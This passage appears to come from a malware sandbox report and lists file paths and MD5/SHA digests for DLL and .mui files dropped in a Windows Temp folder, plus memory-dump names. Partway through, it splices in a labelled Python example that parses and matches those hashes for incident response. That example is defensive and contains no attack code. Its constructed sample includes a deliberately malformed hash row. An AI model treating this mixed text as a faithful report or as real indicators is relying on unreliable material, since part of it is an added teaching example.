| SHA1 | e81ba25d1b7a5df38ff6bc3ab963bd441e903fda |
| SHA256 | f33f03621a2d57ddac266af2af7b32f6dd1734b562a667465157e4961acd8a14 |
| SHA512 | 35cdbd81c5959886ad26866d280b1a2beeb1725991489426e9386c2240d2ddadcebaf4793733ac9f778e0b47ed8114f6a531721e9ac6c4da65d044f800eaa304 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\MsiProvider.dll.mui
| MD5 | 05ff17eb521d849cd7669ae3c0f987f1 |
| SHA1 | 10a05faac056172a526b4cd5aea76e42a5eacdd6 |
| SHA256 | 4ee8c55d8c83cffef3f00faa581c12f2c76c14b2b9a26fdcc512c45f5850e6ec |
| SHA512 | 8a94a0f83fa08e0738510f0bfac9ed2c4015d1f03b2045c2ad0c0f4ab432cbdf2d19d9d403dc86a112ad1ad9793fe1096578d52ea27da5fba5677ba951e7bbb6 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\LogProvider.dll.mui
| MD5 | 59e64d30a6474624a8f9fc4e08ed6404 |
| SHA1 | d9f033841af974249b7d239db1c0ad1e58fef813 |
| SHA256 | a4f2cf869d38a9a8416201b88dfcb1fa430f23d4e4666fe9e16fad4632507817 |
| SHA512 | 47984417cc55cb1d88394bca67399d3e9a45c912a236aec922b4dc3df11884c9fe78a201179c3ac81c970f032c88078639c0a85c81ba3e07ff30722af027d038 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\IntlProvider.dll.mui
| MD5 | 4ecda6437cfccc9757082807dc2452d7 |
| SHA1 | 82b4d4ee6770c95f81858e78679768114c448e6b |
| SHA256 | d44228a806821c3278d39984d025da79c8970649bce4183f70b8d666aa2abf46 |
| SHA512 | bad594522ab63f4a3d578ba617e5dde8a0e65a1d5edfe456dee34e0c0023b23c2858fefdb2dddef366498f92660aab83648fcc7d010706cb03e6592af53d269b |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\ImagingProvider.dll.mui
| MD5 | 20cb06e83e67d929510963f6571b9ae4 |
| SHA1 | f034408047576d34174ad38b21fc7c06dd04b663 |
| SHA256 | 4d3a30c1d716255488dfa53ffb71a2fe8f5eda48617a9991de69525fb40b9c34 |
| SHA512 | 7f9488aa59a12faaf9825ff3ef7d0540329162d35d9a7fc4d27d041c5c4050ceb8362ddb7e8c1a1ed924f54b5717ab14e796c6454fa9efd385f111f290450e62 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\GenericProvider.dll.mui
| MD5 | 9547095b7e78759943044a014ab80099 |
| SHA1 | 19f3517cf067be623c8cfb5f9e90241a21be3d94 |
| SHA256 | 9f18fdba0b24a584659da2997d7073ce657c060687f9036ed5c47c4db3d0b155 |
| SHA512 | ad499c7708e28fbcf90e3349b83eb029d50e876351749d78e240e12b8a32f7b2ef055a80c96d747585f10f1f4ce26e7ab61c0eddce731e1fe192153c225acf75 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\AppxProvider.dll.mui
| MD5 | c0eeea45b07503cdf6033132cdd444c6 |
| SHA1 | 4b81514fad963e87e7e070fce9a8614d5cf23baa |
| SHA256 | 51776526d963bdd7f1b1becb7e2a6ab37922188fef7c444c0474946ec94032e5 |
| SHA512 | a72e5ca651b3a36e55f206fa3f6a27bc3535f2bc3486a0e1e28a5df72d59b7968d5442384bd1902f4466c20319bacd1db3c7adbfa3101f9471521892dcd8d8d4 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\UnattendProvider.dll
| MD5 | f7bd21c4170b1397eb098fa18ef45d4b |
| SHA1 | 05d36abc4853eda468eab68d289337962c76195f |
| SHA256 | 05da5af89fafe492adf5255a7dbf16468be6d130ee8a9d713ab2182c72346db0 |
| SHA512 | 8a804bfe27f25b9d7c87cfb6951e1f1254e984ff9eada0b1547c30352397438d2c9e2f1c3b42c2db43f693b08224e0c7b7a17cd0b21ced893e12c330b91355ff |
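The dropped-file entries above are the report's own listing of paths and digests. As an added example that is not part of the report or of the analyzed sample, the Python below parses that path-then-hash-rows layout into structured records, rejects digests that are not well-formed for their algorithm, and matches a set of observed digests against the records so a responder can confirm whether a file recovered from a host is one of the dropped files. The `SAMPLE_LISTING` string is constructed for the example: it copies the UnattendProvider.dll entry listed above and the de-DE\AppxProvider.dll.mui MD5, and adds one deliberately malformed SHA256 row so the validation path is exercised. Class and function names (`DroppedFile`, `parse_listing`, `match_digests`) are the example's own.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Hex-digest lengths for the algorithms the report lists.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed sample in the report's layout (a path line, then one
# "| ALGO | hexdigest |" row per algorithm). The first entry copies the
# UnattendProvider.dll digests listed above; the second reuses the
# de-DE\AppxProvider.dll.mui MD5 and adds a deliberately malformed row.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\UnattendProvider.dll
| MD5 | f7bd21c4170b1397eb098fa18ef45d4b |
| SHA1 | 05d36abc4853eda468eab68d289337962c76195f |
| SHA256 | 05da5af89fafe492adf5255a7dbf16468be6d130ee8a9d713ab2182c72346db0 |
| SHA512 | 8a804bfe27f25b9d7c87cfb6951e1f1254e984ff9eada0b1547c30352397438d2c9e2f1c3b42c2db43f693b08224e0c7b7a17cd0b21ced893e12c330b91355ff |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\de-DE\AppxProvider.dll.mui
| MD5 | c0eeea45b07503cdf6033132cdd444c6 |
| SHA256 | not-a-hash |
"""

ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([^|]+?)\s*\|$")
HEX_RE = re.compile(r"^[0-9a-f]+$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)    # algorithm -> lowercase hex digest
    problems: list = field(default_factory=list)  # rows rejected during parsing


def parse_listing(text: str) -> list:
    """Turn the path/hash-row layout into DroppedFile records.

    A line that is not a hash row starts a new record; hash rows attach to the
    most recent path. Digests that are not hex, or have the wrong length for
    their algorithm, are recorded under `problems` instead of `hashes`.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            current = DroppedFile(path=line)
            entries.append(current)
            continue
        if current is None:
            raise ValueError(f"hash row before any path line: {line}")
        algo, shown = m.group(1), m.group(2)
        digest = shown.lower()
        if not HEX_RE.match(digest) or len(digest) != DIGEST_LEN[algo]:
            current.problems.append(f"{algo} digest malformed: {shown!r}")
            continue
        current.hashes[algo] = digest
    return entries


def hash_bytes(data: bytes) -> dict:
    """Digest an in-memory blob with every algorithm the report uses."""
    return {algo: hashlib.new(algo.lower(), data).hexdigest() for algo in DIGEST_LEN}


def hash_file(path: str) -> dict:
    """Stream a file on disk through all four algorithms in one pass."""
    hashers = {algo: hashlib.new(algo.lower()) for algo in DIGEST_LEN}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            for h in hashers.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hashers.items()}


def match_digests(observed: dict, entries: list) -> list:
    """Return the entries whose every recorded digest equals the observed one.

    Requiring all recorded algorithms to agree means an MD5-only collision
    cannot produce a false match against an entry that also lists SHA256.
    """
    observed = {k.upper(): v.lower() for k, v in observed.items()}
    return [
        e for e in entries
        if e.hashes and all(observed.get(a) == d for a, d in e.hashes.items())
    ]


if __name__ == "__main__":
    records = parse_listing(SAMPLE_LISTING)
    for rec in records:
        print(rec.path)
        for algo, digest in rec.hashes.items():
            print(f"  {algo:<6} {digest}")
        for problem in rec.problems:
            print(f"  REJECTED {problem}")
```

On a live host, run `hash_file` over the suspect file and pass the result to `match_digests`; because a match requires every algorithm the report recorded, a single weak-hash collision is not enough to confirm identity, and an entry whose rows were all rejected during parsing can never match.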
memory/4720-214-0x000000001EFE0000-0x000000001EFE2000-memory.dmp
memory/400-215-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp
memory/400-216-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp
memory/400-218-0x0000000002070000-0x00000000020AD000-memory.dmp
memory/400-217-0x00007FFE80000000-0x00007FFE80002000-memory.dmp
memory/400-219-0x00007FFE80030000-0x00007FFE80031000-memory.dmp
memory/400-220-0x0000000140000000-0x0000000140E83000-memory.dmp
memory/400-221-0x0000000140000000-0x0000000140E83000-memory.dmp
memory/400-222-0x00000000001D0000-0x00000000001F0000-memory.dmp